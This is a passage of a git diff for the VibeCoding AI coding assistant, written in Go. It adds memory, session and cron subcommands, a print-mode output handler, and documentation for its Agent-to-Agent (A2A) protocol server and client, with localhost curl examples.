+		RunE: func(cmd *cobra.Command, args []string) error {
+			cfg, err := hermes.LoadHermesConfig()
+			if err != nil {
+				return err
+			}
+			store := memory.NewStore(cfg.Memory.Path, cfg.GetWorkDir())
+			if err := store.WriteAll("# Agent Memory\n\n## User Profile\n\n## Working Memory\n\n## Lessons Learned\n"); err != nil {
+				return err
+			}
+			fmt.Println("Memory cleared.")
+			return nil
+		},
+	}
+
+	memoryCmd.AddCommand(memoryShowCmd, memoryClearCmd)
+
+	// --- sessions ---
+
+	sessionsCmd := &cobra.Command{
+		Use:   "sessions",
+		Short: "Manage hermes sessions",
+	}
+
+	sessionsListCmd := &cobra.Command{
+		Use:   "list",
+		Short: "List active sessions (queries running instance)",
+		RunE: func(cmd *cobra.Command, args []string) error {
+			cfg, err := hermes.LoadHermesConfig()
+			if err != nil {
+				return err
+			}
+			url := fmt.Sprintf("http://%s/api/sessions", cfg.GetListenAddr())
+			client := &http.Client{Timeout: 2 * time.Second}
+			resp, err := client.Get(url)
+			if err != nil {
+				return fmt.Errorf("cannot reach hermes: %w (is it running?)", err)
+			}
+			defer resp.Body.Close()
+			var result map[string]any
+			json.NewDecoder(resp.Body).Decode(&result)
+			data, _ := json.MarshalIndent(result, "", "  ")
+			fmt.Println(string(data))
+			return nil
+		},
+	}
+
+	sessionsCmd.AddCommand(sessionsListCmd)
+
+	hermesCmd.AddCommand(webhookCmd, memoryCmd, sessionsCmd)
+
+	return hermesCmd
+}
+
+// newCronCommand builds the "cron" subcommand tree.
+func newCronCommand() *cobra.Command {
+	var (
+		flagSchedule  string
+		flagOneShot   bool
+		flagA2ATarget string
+		flagA2AToken  string
+	)
+
+	cronCmd := &cobra.Command{
+		Use:   "cron",
+		Short: "Manage cron scheduled tasks",
+	}
+
+	cronListCmd := &cobra.Command{
+		Use:   "list",
+		Short: "List all cron jobs",
+		RunE: func(cmd *cobra.Command, args []string) error {
+			store := openCronStore()
+			jobs, err := store.List()
+			if err != nil {
+				return err
+			}
+			if len(jobs) == 0 {
+				fmt.Println("No cron jobs.")
+				return nil
+			}
+			for _, j := range jobs {
+				enabled := "✅"
+				if !j.Enabled {
+					enabled = "⏸"
+				}
+				kind := "periodic"
+				if j.OneShot {
+					kind = "one-shot"
+				}
+				fmt.Printf("%s [%s] %s (%s, %s, runs: %d)\n", enabled, j.ID, j.Name, kind, j.Schedule, j.RunCount)
+			}
+			return nil
+		},
+	}
+
+	cronAddCmd := &cobra.Command{
+		Use:   "add <name> <prompt>",
+		Short: "Add a cron job",
+		Args:  cobra.MinimumNArgs(2),
+		RunE: func(cmd *cobra.Command, args []string) error {
+			store := openCronStore()
+			name := args[0]
+			prompt := args[1]
+			job, err := store.Create(cron.CronJob{
+				Name:      name,
+				Prompt:    prompt,
+				Schedule:  flagSchedule,
+				OneShot:   flagOneShot,
+				Enabled:   true,
+				Mode:      "yolo",
+				A2ATarget: flagA2ATarget,
+				A2AToken:  flagA2AToken,
+			})
+			if err != nil {
+				return err
+			}
+			fmt.Printf("✅ Created: [%s] %s\n", job.ID, job.Name)
+			if job.A2ATarget != "" {
+				fmt.Printf("   A2A Target: %s\n", job.A2ATarget)
+			}
+			return nil
+		},
+	}
+	cronAddCmd.Flags().StringVar(&flagSchedule, "schedule", "", "Schedule: @daily, @weekly, @every 30m, etc.")
+	cronAddCmd.Flags().BoolVar(&flagOneShot, "oneshot", false, "One-shot task (auto-disable after first run)")
+	cronAddCmd.Flags().StringVar(&flagA2ATarget, "a2a-target", "", "A2A server URL (send task via A2A protocol)")
+	cronAddCmd.Flags().StringVar(&flagA2AToken, "a2a-token", "", "Bearer token for A2A server")
+
+	cronRemoveCmd := &cobra.Command{
+		Use:   "remove <id>",
+		Short: "Remove a cron job",
+		Args:  cobra.ExactArgs(1),
+		RunE: func(cmd *cobra.Command, args []string) error {
+			store := openCronStore()
+			if err := store.Delete(args[0]); err != nil {
+				return err
+			}
+			fmt.Printf("🗑 Removed: %s\n", args[0])
+			return nil
+		},
+	}
+
+	cronEnableCmd := &cobra.Command{
+		Use:   "enable <id>",
+		Short: "Enable a cron job",
+		Args:  cobra.ExactArgs(1),
+		RunE: func(cmd *cobra.Command, args []string) error {
+			return setCronEnabled(args[0], true)
+		},
+	}
+
+	cronDisableCmd := &cobra.Command{
+		Use:   "disable <id>",
+		Short: "Disable a cron job",
+		Args:  cobra.ExactArgs(1),
+		RunE: func(cmd *cobra.Command, args []string) error {
+			return setCronEnabled(args[0], false)
+		},
+	}
+
+	cronCmd.AddCommand(cronListCmd, cronAddCmd, cronRemoveCmd, cronEnableCmd, cronDisableCmd)
+	return cronCmd
+}
diff --git a/cmd/vibecoding/main_test.go b/cmd/vibecoding/main_test.go
index 4334ff7..57881e8 100644
--- a/cmd/vibecoding/main_test.go
+++ b/cmd/vibecoding/main_test.go
@@ -57,6 +57,7 @@ func TestRootParsesSessionFlags(t *testing.T) {
 		"--resume", "abc123",
 		"--session", "def456",
 		"--sandbox",
+		"--web-search",
 	})
 
 	if err := cmd.Execute(); err != nil {
@@ -86,6 +87,9 @@ func TestRootParsesSessionFlags(t *testing.T) {
 	if !got.sandbox {
 		t.Fatal("expected sandbox flag")
 	}
+	if !got.webSearch {
+		t.Fatal("expected web-search flag")
+	}
 }
 
 func TestACPParsesSharedFlagsWithoutRootFlags(t *testing.T) {
diff --git a/cmd/vibecoding/main_util.go b/cmd/vibecoding/main_util.go
new file mode 100644
index 0000000..27a7687
--- /dev/null
+++ b/cmd/vibecoding/main_util.go
@@ -0,0 +1,308 @@
+package main
+
+import (
+	"context"
+	"fmt"
+	"io"
+	"os"
+	"strings"
+	"time"
+
+	"golang.org/x/term"
+
+	"github.com/charmbracelet/glamour"
+
+	"github.com/startvibecoding/vibecoding/internal/agent"
+	"github.com/startvibecoding/vibecoding/internal/config"
+	ctxpkg "github.com/startvibecoding/vibecoding/internal/context"
+	"github.com/startvibecoding/vibecoding/internal/provider"
+	providerfactory "github.com/startvibecoding/vibecoding/internal/provider/factory"
+	"github.com/startvibecoding/vibecoding/internal/session"
+	"github.com/startvibecoding/vibecoding/internal/tools"
+)
+
+var debugEnabled bool
+
+// clearStdin reads and discards any pending input from stdin.
+// This is needed because some terminals send color query sequences on startup.
+func clearStdin() {
+	// Set a short read deadline so pending reads time out cleanly.
+	// Some stdin types (pipes, certain PTYs) don't support deadlines;
+	// if SetReadDeadline fails we skip clearing to avoid blocking forever.
+	if err := os.Stdin.SetReadDeadline(time.Now().Add(50 * time.Millisecond)); err != nil {
+		return
+	}
+	defer os.Stdin.SetReadDeadline(time.Time{}) // Clear deadline
+	buf := make([]byte, 128)
+	for {
+		n, err := os.Stdin.Read(buf)
+		if n == 0 || err != nil {
+			return
+		}
+	}
+}
+
+// debugLog prints debug messages to stderr if debug mode is enabled.
+func debugLog(format string, args ...interface{}) {
+	if debugEnabled {
+		fmt.Fprintf(os.Stderr, "[DEBUG] "+format+"\n", args...)
+	}
+}
+
+// createProvider creates a provider from config based on provider name.
+func createProvider(settings *config.Settings, providerName, modelID string) (provider.Provider, *provider.Model, error) {
+	return providerfactory.Create(settings, providerName, modelID)
+}
+
+func runPrint(args []string, p provider.Provider, model *provider.Model, mode string, thinkingLevel provider.ThinkingLevel, settings *config.Settings, registry *tools.Registry, sess *session.Manager, extraContext string, multiAgent bool, agentMgr *agent.AgentManager) error {
+	input := strings.Join(args, " ")
+	if input == "" {
+		data, err := io.ReadAll(os.Stdin)
+		if err != nil {
+			return fmt.Errorf("no input provided")
+		}
+		input = string(data)
+	}
+
+	fmt.Fprintf(os.Stderr, "Using %s/%s in %s mode\n", p.Name(), model.ID, mode)
+
+	// Create glamour renderer for markdown
+	wordWrap := 80
+	if w, _, err := term.GetSize(int(os.Stdout.Fd())); err == nil && w > 0 {
+		wordWrap = w
+	}
+	renderer, err := glamour.NewTermRenderer(
+		glamour.WithStandardStyle("dark"),
+		glamour.WithWordWrap(wordWrap),
+	)
+	if err != nil {
+		debugLog("Failed to create glamour renderer: %v", err)
+		renderer = nil
+	}
+
+	compactionSettings := ctxpkg.CompactionSettings{
+		Enabled:          settings.Compaction.Enabled,
+		ReserveTokens:    settings.Compaction.ReserveTokens,
+		KeepRecentTokens: settings.Compaction.KeepRecentTokens,
+	}
+	if compactionSettings.ReserveTokens == 0 {
+		compactionSettings.ReserveTokens = 16384
+	}
+	if compactionSettings.KeepRecentTokens == 0 {
+		compactionSettings.KeepRecentTokens = 20000
+	}
+
+	agentCfg := agent.Config{
+		Provider:           p,
+		Model:              model,
+		Mode:               mode,
+		ThinkingLevel:      thinkingLevel,
+		MaxTokens:          settings.MaxOutputTokens,
+		Settings:           settings,
+		Session:            sess,
+		ExtraContext:       extraContext,
+		CompactionSettings: compactionSettings,
+		MultiAgent:         multiAgent,
+	}
+
+	a := agent.New(agentCfg, registry)
+	if multiAgent && agentMgr != nil {
+		agentMgr.Register(agent.NewAgentAdapter(a))
+	}
+
+	ctx := context.Background()
+	eventCh := a.Run(ctx, input)
+
+	var textBuffer strings.Builder
+	var runErr error
+
+	err = agent.ConsumeEvents(ctx, eventCh, agent.EventHandlerFunc(func(_ context.Context, event agent.Event) error {
+		switch event.Type {
+		case agent.EventToolApprovalRequest:
+			return fmt.Errorf("tool approval required in print mode for %s; rerun interactively, use --mode yolo, or whitelist the command", event.ApprovalTool)
+		case agent.EventTextDelta:
+			textBuffer.WriteString(event.TextDelta)
+		case agent.EventToolCall:
+			// Flush text buffer before tool call
+			if textBuffer.Len() > 0 {
+				flushTextBuffer(&textBuffer, renderer)
+			}
+			fmt.Fprintf(os.Stderr, "\n[tool: %s]\n", event.ToolCall.Name)
+		case agent.EventToolExecutionStart:
+			fmt.Fprintf(os.Stderr, "[running: %s] ", event.ToolName)
+		case agent.EventToolExecutionEnd:
+			if event.ToolError != nil {
+				fmt.Fprintf(os.Stderr, "error: %v\n", event.ToolError)
+			} else {
+				fmt.Fprintf(os.Stderr, "done\n")
+			}
+		case agent.EventToolResult:
+			// Show full tool result for bash commands
+			if event.ToolName == "bash" {
+				fmt.Fprintf(os.Stderr, "\n%s\n", event.ToolResult)
+			} else if event.ToolDiff != nil {
+				fmt.Fprintf(os.Stderr, "\n[change: %s] +%d -%d (-%s +%s)\n",
+					event.ToolDiff.Path,
+					event.ToolDiff.Added,
+					event.ToolDiff.Deleted,
+					formatLineRanges(event.ToolDiff.DeletedLines),
+					formatLineRanges(event.ToolDiff.AddedLines),
+				)
+			}
+		case agent.EventPlanUpdate:
+			if event.Plan != nil {
+				fmt.Fprintf(os.Stderr, "\n%s\n", formatTaskPlan(event.Plan))
+			}
+		case agent.EventDone:
+			// Flush remaining text buffer
+			if textBuffer.Len() > 0 {
+				flushTextBuffer(&textBuffer, renderer)
+			}
+			// Show context usage
+			if event.ContextUsage != nil && event.ContextUsage.Percent != nil {
+				fmt.Fprintf(os.Stderr, "\nContext: %.1f%%/%s\n",
+					*event.ContextUsage.Percent,
+					formatTokenCount(event.ContextUsage.ContextWindow))
+			}
+		case agent.EventError:
+			runErr = event.Error
+			// Flush text buffer before error
+			if textBuffer.Len() > 0 {
+				flushTextBuffer(&textBuffer, renderer)
+			}
+			if event.Error != nil {
+				return event.Error
+			}
+		case agent.EventUsage:
+			if event.ContextUsage != nil && event.ContextUsage.Percent != nil {
+				fmt.Fprintf(os.Stderr, "Context: %.1f%%/%s | ",
+					*event.ContextUsage.Percent,
+					formatTokenCount(event.ContextUsage.ContextWindow))
+			}
+			if event.Usage != nil {
+				cacheInfo := ""
+				if info := event.Usage.CacheInfo(); info != "" {
+					cacheInfo = " | " + info
+				}
+				fmt.Fprintf(os.Stderr, "Tokens: %d↓/%d↑ $%.4f%s\n",
+					event.Usage.TotalInputTokens(), event.Usage.Output, event.Usage.Cost.Total, cacheInfo)
+			}
+		case agent.EventCompactionStart:
+			fmt.Fprintf(os.Stderr, "\n⏳ Compacting context...\n")
+		case agent.EventCompactionEnd:
+			if event.Error != nil {
+				fmt.Fprintf(os.Stderr, "Compaction failed: %v\n", event.Error)
+			} else if event.StatusMessage != "" {
+				fmt.Fprintf(os.Stderr, "✅ %s\n", event.StatusMessage)
+			} else {
+				fmt.Fprintf(os.Stderr, "✅ Context compacted\n")
+			}
+		}
+		return nil
+	}))
+	if multiAgent && agentMgr != nil {
+		finishErr := runErr
+		if finishErr == nil {
+			finishErr = err
+		}
+		agentMgr.Finish(a.ID(), finishErr)
+	}
+	if err != nil {
+		return err
+	}
+
+	return nil
+}
+
+func formatTaskPlan(plan *tools.TaskPlan) string {
+	if plan == nil || len(plan.Steps) == 0 {
+		return "Plan updated."
+	}
+	var sb strings.Builder
+	title := plan.Title
+	if title == "" {
+		title = "Plan"
+	}
+	sb.WriteString(title)
+	for _, step := range plan.Steps {
+		sb.WriteString("\n")
+		sb.WriteString(fmt.Sprintf("%s %s", planStatusMarker(step.Status), step.Title))
+	}
+	if plan.Note != "" {
+		sb.WriteString("\nnote: " + plan.Note)
+	}
+	return sb.String()
+}
+
+func planStatusMarker(status string) string {
+	switch status {
+	case "running":
+		return ">"
+	case "done":
+		return "x"
+	case "failed":
+		return "!"
+	default:
+		return "-"
+	}
+}
+
+func formatLineRanges(lines []int) string {
+	if len(lines) == 0 {
+		return "none"
+	}
+	var ranges []string
+	start, prev := lines[0], lines[0]
+	for _, line := range lines[1:] {
+		if line == prev+1 {
+			prev = line
+			continue
+		}
+		ranges = append(ranges, formatLineRange(start, prev))
+		start, prev = line, line
+	}
+	ranges = append(ranges, formatLineRange(start, prev))
+	return strings.Join(ranges, ",")
+}
+
+func formatLineRange(start, end int) string {
+	if start == end {
+		return fmt.Sprintf("%d", start)
+	}
+	return fmt.Sprintf("%d-%d", start, end)
+}
+
+// flushTextBuffer renders and prints the accumulated text buffer.
+func flushTextBuffer(buffer *strings.Builder, renderer *glamour.TermRenderer) {
+	text := buffer.String()
+	buffer.Reset()
+
+	if renderer != nil {
+		rendered, err := renderer.Render(text)
+		if err != nil {
+			// Fallback to plain text
+			fmt.Print(text)
+		} else {
+			fmt.Print(rendered)
+		}
+	} else {
+		fmt.Print(text)
+	}
+}
+
+// formatTokenCount formats a token count for display.
+func formatTokenCount(count int) string {
+	if count < 1000 {
+		return fmt.Sprintf("%d", count)
+	}
+	if count < 10000 {
+		return fmt.Sprintf("%.1fk", float64(count)/1000)
+	}
+	if count < 1000000 {
+		return fmt.Sprintf("%dk", count/1000)
+	}
+	if count < 10000000 {
+		return fmt.Sprintf("%.1fM", float64(count)/1000000)
+	}
+	return fmt.Sprintf("%dM", count/1000000)
+}
diff --git a/docs/en/README.md b/docs/en/README.md
index 2fef722..f7658af 100644
--- a/docs/en/README.md
+++ b/docs/en/README.md
@@ -8,6 +8,10 @@
   <strong>AI-Powered Terminal Coding Assistant</strong>
 </p>
 
+<p align="center">
+  Progressive and agile vibe-coding tool. No need to re-deploy Claude Code, Codex, Claw, or Hermes — everything is packed into a single file.
+</p>
+
 <p align="center">
   <a href="https://www.npmjs.com/package/vibecoding-installer"><img src="https://img.shields.io/npm/dm/vibecoding-installer.svg" alt="npm downloads"></a>
   <a href="https://github.com/startvibecoding/vibecoding/releases/latest"><img src="https://img.shields.io/github/release/startvibecoding/vibecoding.svg" alt="GitHub release"></a>
@@ -44,6 +48,7 @@ Welcome to the VibeCoding Documentation Center!
 - [System Architecture](architecture.md) — Project structure, core components, data flow
 - [Tool System](tools.md) — Built-in tools usage guide
 - [Skills System](skills.md) — Reusable prompt snippets
+- [Online Skill Marketplace](skillhub.md) — Compatible with SkillHub / ClawHub, skill installation & cron foundation
 - [Session Management](sessions.md) — Session storage and management
 - [SDK Integration](sdk.md) — Embed VibeCoding agent in your Go applications
 
@@ -53,6 +58,14 @@ Welcome to the VibeCoding Documentation Center!
 ### IDE Integration
 - [ACP Protocol](acp.md) — Agent Client Protocol for VS Code and JetBrains
 
+### Gateway Modes
+- [Gateway Mode](gateway.md) — OpenAI-compatible HTTP gateway
+- [Hermes Mode](hermes.md) — Messaging gateway (WeChat/Feishu/WebSocket)
+- [A2A Protocol](a2a.md) — Agent-to-Agent protocol server and Master mode
+
+### Scenarios
+- [Scenarios & Walkthroughs](scenarios.md) — Practical usage examples for all modes
+
 ### Development
 - [Development Guide](development.md) — Contributing code, testing, building
 
@@ -71,7 +84,9 @@ Welcome to the VibeCoding Documentation Center!
 | [ACP Protocol](acp.md) | IDE integration via Agent Client Protocol |
 | [Session Management](sessions.md) | Conversation history and branching |
 | [Skills System](skills.md) | Create reusable prompt snippets |
+| [Online Skill Marketplace](skillhub.md) | SkillHub / ClawHub integration and cron foundation |
 | [SDK Integration](sdk.md) | Embed VibeCoding agent in your Go applications |
+| [Scenarios & Walkthroughs](scenarios.md) | Practical usage examples for all modes |
 | [Changelog](changelog.md) | See what's new in each release |
 
 ## Supported LLMs
@@ -81,7 +96,7 @@ Welcome to the VibeCoding Documentation Center!
 | **DeepSeek** (default) | deepseek-v4-flash, deepseek-v4-pro | OpenAI Chat / Anthropic Messages |
 | **OpenAI** | GPT-4o, o1, etc. | OpenAI Chat |
 | **Anthropic** | Claude Sonnet, Opus, etc. | Anthropic Messages |
-| **Vendor adapters** | Xiaomi, Kimi, MiniMax, Seed, Qianfan, Bailian, Gitee, OpenRouter, Together, Groq, Fireworks, and more | OpenAI Chat or Anthropic Messages |
+| **Vendor adapters** | Google Gemini, Google Vertex, Xiaomi, Kimi, MiniMax, Seed, Qianfan, Bailian, Gitee, OpenRouter, Together, Groq, Fireworks, and more | OpenAI Chat or Anthropic Messages |
 | **Custom** | Any compatible model | Generic OpenAI Chat or Anthropic Messages fallback |
 
 ## Quick Install
diff --git a/docs/en/a2a.md b/docs/en/a2a.md
new file mode 100644
index 0000000..7ea7f08
--- /dev/null
+++ b/docs/en/a2a.md
@@ -0,0 +1,372 @@
+# A2A Protocol (Agent-to-Agent)
+
+## Overview
+
+The A2A (Agent-to-Agent) protocol enables different AI agents to discover, communicate, and collaborate with each other. VibeCoding implements the A2A protocol as both a **standalone server** and an **integrated mode** within Hermes.
+
+## Quick Start
+
+```bash
+# Standalone mode
+vibecoding a2a start
+
+# Check status
+vibecoding a2a status
+
+# View Agent Card
+vibecoding a2a card
+
+# Send task to another A2A server
+vibecoding a2a send "list all Go files" --target http://remote:8093
+
+# Discover remote Agent Card
+vibecoding a2a discover http://remote:8093
+
+# Stop
+vibecoding a2a stop
+```
+
+## Running Modes
+
+### Standalone Mode
+
+Runs a dedicated A2A HTTP server on a separate port (default: `127.0.0.1:8093`).
+
+```bash
+vibecoding a2a start --port 8093 --work-dir /path/to/project
+```
+
+Use `--host 0.0.0.0` only when you intentionally want to expose the A2A server beyond loopback, and configure an auth token for exposed deployments.
+
+### Integration Mode
+
+A2A endpoints are mounted on the Hermes gateway when `a2a.enabled: true` in `hermes.json`.
+
+```jsonc
+{
+  "a2a": {
+    "enabled": true,
+    "port": 8093  // ignored in integration mode (uses hermes port)
+  }
+}
+```
+
+Endpoints are available at:
+- `http://localhost:8090/.well-known/agent.json`
+- `http://localhost:8090/a2a`
+- `http://localhost:8090/a2a/events`
+
+## Protocol Details
+
+- **Transport**: JSON-RPC 2.0 over HTTP
+- **Streaming**: SSE (Server-Sent Events) for real-time updates
+- **Task Lifecycle**: `submitted` → `working` → `completed`/`failed`/`canceled`
+
+## Agent Card
+
+The Agent Card describes the agent's capabilities and is served at `/.well-known/agent.json`.
+
+```json
+{
+  "name": "VibeCoding",
+  "description": "AI coding assistant with file editing, terminal, and search capabilities",
+  "url": "http://localhost:8093/a2a",
+  "version": "0.1.31",
+  "capabilities": {
+    "streaming": true,
+    "pushNotifications": false
+  },
+  "skills": [
+    {
+      "id": "code-edit",
+      "name": "Code Editing",
+      "description": "Read, write, and edit code files with precise text replacement"
+    },
+    {
+      "id": "terminal",
+      "name": "Terminal Execution",
+      "description": "Execute shell commands, run tests, build projects"
+    },
+    {
+      "id": "code-search",
+      "name": "Code Search",
+      "description": "Search codebases with ripgrep and fd"
+    }
+  ]
+}
+```
+
+## JSON-RPC Methods
+
+### `message/send`
+
+Send a message to create or continue a task.
+
+**Request:**
+```json
+{
+  "jsonrpc": "2.0",
+  "method": "message/send",
+  "params": {
+    "task_id": "task_123",  // optional, omit to create new task
+    "message": {
+      "role": "user",
+      "parts": [
+        {"type": "text", "text": "Help me refactor main.go"}
+      ]
+    }
+  },
+  "id": 1
+}
+```
+
+**Response (sync):**
+```json
+{
+  "jsonrpc": "2.0",
+  "result": {
+    "id": "task_123",
+    "state": "completed",
+    "artifacts": [
+      {
+        "name": "response",
+        "parts": [{"type": "text", "text": "I've analyzed main.go..."}]
+      }
+    ]
+  },
+  "id": 1
+}
+```
+
+**SSE Streaming (add `Accept: text/event-stream` header):**
+```
+data: {"task_id":"task_123","state":"working","message":{"role":"agent","parts":[{"type":"text","text":"Let me"}]}}
+
+data: {"task_id":"task_123","state":"working","message":{"role":"agent","parts":[{"type":"text","text":" analyze the code..."}]}}
+
+data: {"task_id":"task_123","state":"completed","artifact":{"name":"response","parts":[{"type":"text","text":"Here's the refactored version..."}]}}
+```
+
+### `task/get`
+
+Get the current state of a task.
+
+**Request:**
+```json
+{
+  "jsonrpc": "2.0",
+  "method": "task/get",
+  "params": {
+    "task_id": "task_123"
+  },
+  "id": 2
+}
+```
+
+### `task/cancel`
+
+Cancel a running task.
+
+**Request:**
+```json
+{
+  "jsonrpc": "2.0",
+  "method": "task/cancel",
+  "params": {
+    "task_id": "task_123"
+  },
+  "id": 3
+}
+```
+
+## REST Endpoints
+
+For simpler integration, REST-style endpoints are also available:
+
+| Endpoint | Method | Description |
+|----------|--------|-------------|
+| `/.well-known/agent.json` | GET | Agent Card |
+| `/a2a` | POST | JSON-RPC 2.0 endpoint |
+| `/a2a/send` | POST | Submit task (sync or SSE) |
+| `/a2a/task?task_id=xxx` | GET | Get task state |
+| `/a2a/task/cancel` | POST | Cancel task |
+| `/a2a/events?task_id=xxx` | GET | SSE event stream |
+
+## Task States
+
+```
+submitted ─► working ─► completed
+                    ─► failed
+                    ─► canceled
+```
+
+## Examples
+
+### Submit Task (curl)
+
+```bash
+# Sync response
+curl -X POST http://localhost:8093/a2a \
+  -H "Content-Type: application/json" \
+  -d '{
+    "jsonrpc": "2.0",
+    "method": "message/send",
+    "params": {
+      "message": {
+        "role": "user",
+        "parts": [{"type": "text", "text": "List all Go files in the project"}]
+      }
+    },
+    "id": 1
+  }'
+
+# SSE streaming
+curl -X POST http://localhost:8093/a2a \
+  -H "Content-Type: application/json" \
+  -H "Accept: text/event-stream" \
+  -d '{
+    "jsonrpc": "2.0",
+    "method": "message/send",
+    "params": {
+      "message": {
+        "role": "user",
+        "parts": [{"type": "text", "text": "Explain the project structure"}]
+      }
+    },
+    "id": 1
+  }'
+```
+
+### REST API
+
+```bash
+# Submit task
+curl -X POST http://localhost:8093/a2a/send \
+  -H "Content-Type: application/json" \
+  -d '{"message": {"role": "user", "parts": [{"type": "text", "text": "Hello"}]}}'
+
+# Get task
+curl http://localhost:8093/a2a/task?task_id=task_123
+
+# Cancel task
+curl -X POST http://localhost:8093/a2a/task/cancel \
+  -H "Content-Type: application/json" \
+  -d '{"task_id": "task_123"}'
+```
+
+## Security
+
+- **Auth Token**: Bearer token authentication (same as hermes)
+- **Agent Card**: Publicly accessible (no auth required)
+- **Protected Endpoints**: `/a2a`, REST A2A routes, and `/a2a/events` require auth when `auth_token` is configured
+
+When auth is configured, clients must send:
+
+```bash
+Authorization: Bearer <auth_token>
+```
+
+## A2A Client
+
+Send tasks to other A2A servers.
+
+```bash
+# Send a task
+vibecoding a2a send "explain the project structure" --target http://remote:8093
+
+# Send with auth token
+vibecoding a2a send "run tests" --target http://remote:8093 --auth-token xxx
+
+# Discover what a server can do
+vibecoding a2a discover http://remote:8093
+```
+
+## A2A Scheduling
+
+Cron jobs can send tasks to A2A servers instead of running local agents.
+
+```bash
+# Schedule a daily task to a remote A2A server
+vibecoding hermes cron add "daily-review" "review recent changes" \
+  --schedule "@daily" \
+  --a2a-target http://review-agent:8093
+
+# Schedule with auth
+vibecoding hermes cron add "ci-check" "run CI tests" \
+  --schedule "@every 1h" \
+  --a2a-target http://ci-agent:8093 \
+  --a2a-token ${CI_TOKEN}
+```
+
+The cron scheduler will send the prompt to the A2A server instead of spawning a local agent.
+
+## A2A Master Mode
+
+A2A Master mode lets you manage multiple remote A2A agents from a single VibeCoding instance and dispatch tasks to them via the `a2a_dispatch` tool.
+
+### Quick Start
+
+```bash
+# 1. Generate sample config
+vibecoding --init-a2a-master-config
+
+# 2. Edit a2a-list.json with your remote agent details
+#    Location: ~/.vibecoding/a2a-list.json or .vibe/a2a-list.json
+
+# 3. Enable master mode
+vibecoding --enable-a2a-master
+```
+
+### Configuration
+
+`a2a-list.json` structure:
+
+```json
+{
+  "agents": [
+    {
+      "name": "code-reviewer",
+      "url": "http://localhost:8093"
+    },
+    {
+      "name": "ci-agent",
+      "url": "http://ci-server:8093",
+      "auth_token": "your-secret-token"
+    }
+  ]
+}
+```
+
+| Field | Type | Description |
+|-------|------|-------------|
+| `name` | string | Agent name (unique identifier, used in tool calls) |
+| `url` | string | A2A server URL |
+| `auth_token` | string | Bearer token (optional) |
+
+Config file locations (low to high priority):
+- `~/.vibecoding/a2a-list.json` (global)
+- `.vibe/a2a-list.json` (project-level, overrides global)
+
+### a2a_dispatch Tool
+
+When enabled, the LLM gets an `a2a_dispatch` tool to send tasks to registered remote agents:
+
+**Parameters:**
+| Parameter | Type | Description |
+|-----------|------|-------------|
+| `agent_name` | string | Target agent name (auto-enumerated from config) |
+| `message` | string | Task message |
+
+**Examples:**
+```
+a2a_dispatch(agent_name="code-reviewer", message="review main.go for bugs")
+a2a_dispatch(agent_name="ci-agent", message="run all unit tests")
+```
+
+### CLI Flags
+
+| Flag | Description |
+|------|-------------|
+| `--enable-a2a-master` | Enable A2A Master mode (off by default) |
+| `--init-a2a-master-config` | Generate sample `a2a-list.json` |
+| `--force` | Overwrite existing config file |
diff --git a/docs/en/architecture.md b/docs/en/architecture.md
index df4cd1d..d7ed668 100644
--- a/docs/en/architecture.md
+++ b/docs/en/architecture.md
@@ -8,6 +8,16 @@ vibecoding/
 ├── cmd/vibecoding/              # CLI entry point
 │   └── main.go                  # Main program
 ├── internal/
+│   ├── a2a/                     # A2A protocol server and master mode
+│   │   ├── config.go            # A2A configuration and initialization
+│   │   ├── handler.go           # JSON-RPC 2.0 handler + SSE
+│   │   ├── client.go            # A2A client
+│   │   ├── server.go            # HTTP server
+│   │   ├── executor.go          # Task → Agent loop executor
+│   │   ├── agent_card.go        # Agent Card generation
+│   │   ├── task.go              # Task lifecycle management
+│   │   └── master.go            # A2A Master mode (remote agent dispatch)
+│   ├── acp/                     # ACP / MCP integration
 │   ├── agent/                   # Core Agent loop
 │   │   ├── agent.go             # Agent main logic
 │   │   ├── factory.go           # AgentFactory for per-agent construction
@@ -20,13 +30,18 @@ vibecoding/
 │   ├── config/                  # Configuration management
 │   ├── context/                 # Context management and token estimation
 │   ├── contextfiles/            # Context file loading
+│   ├── cron/                    # Scheduled task store and scheduler
+│   ├── gateway/                 # OpenAI-compatible HTTP gateway
+│   ├── hermes/                  # Messaging gateway (WeChat/Feishu/WebSocket)
+│   ├── mcp/                     # MCP server integration
+│   ├── memory/                  # Persistent memory (memory.md)
+│   ├── messaging/               # Messaging platform abstraction
 │   ├── platform/                # Cross-platform compatibility utilities
 │   ├── provider/                # LLM Provider abstraction
 │   │   ├── anthropic/           # Anthropic Messages API
 │   │   ├── factory/             # Shared provider/model construction
 │   │   ├── vendor*.go           # Vendor adapter registry and defaults
 │   │   └── openai/              # OpenAI Chat Completions API
-│   ├── cron/                    # Scheduled task store and scheduler
 │   ├── sandbox/                 # Sandbox abstraction (bwrap, none)
 │   ├── session/                 # Session management (JSONL)
 │   ├── skills/                  # Skills system
@@ -37,19 +52,49 @@ vibecoding/
 │   │   ├── edit.go              # File editing
 │   │   ├── grep.go              # Content search
 │   │   ├── find.go              # File finding
-│   │   └── ls.go                # Directory listing
+│   │   ├── ls.go                # Directory listing
+│   │   ├── plan.go              # Task planning
+│   │   ├── skill_ref.go         # Skill reference loading
+│   │   └── a2a_dispatch.go      # A2A remote agent dispatch
 │   ├── tui/                     # Terminal UI (BubbleTea)
-│   └── ua/                      # User-Agent string generation
+│   ├── ua/                      # User-Agent string generation
+│   └── vendored/                # Embedded binaries (rg, fd)
+└── pkg/sdk/                     # Public SDK interface
+```
+
+## Running Modes
+
+VibeCoding supports 7 running modes, all sharing the same Agent, Provider, Tools,
+and Session infrastructure:
+
+```
+┌─────────────────────────────────────────────────────────────────────────┐
+│                        VibeCoding Running Modes                         │
+├─────────────────────────────────────────────────────────────────────────┤
+│                                                                         │
+│  ┌──────────────┐  ┌──────────────┐  ┌──────────────┐                  │
+│  │  TUI (default)│  │  Print Mode   │  │  ACP stdio   │                  │
+│  │  vibecoding   │  │  vibecoding   │  │  vibecoding   │                  │
+│  │              │  │  -p "..."     │  │  acp          │                  │
+│  └──────────────┘  └──────────────┘  └──────────────┘                  │
+│                                                                         │
+│  ┌──────────────┐  ┌──────────────┐  ┌──────────────┐  ┌────────────┐ │
+│  │ Gateway Mode  │  │  Hermes Mode  │  │ A2A Standalone│  │ A2A Master │ │
+│  │  vibecoding   │  │  vibecoding   │  │ vibecoding    │  │ --enable-  │ │
+│  │  gateway      │  │  hermes       │  │ a2a start     │  │ a2a-master │ │
+│  └──────────────┘  └──────────────┘  └──────────────┘  └────────────┘ │
+│                                                                         │
+└─────────────────────────────────────────────────────────────────────────┘
 ```
 
 ## Core Components
 
 ### 1. Provider System
 
-Provider is an abstraction layer for interacting with LLM APIs. CLI and ACP
-provider creation both go through `internal/provider/factory`, which applies
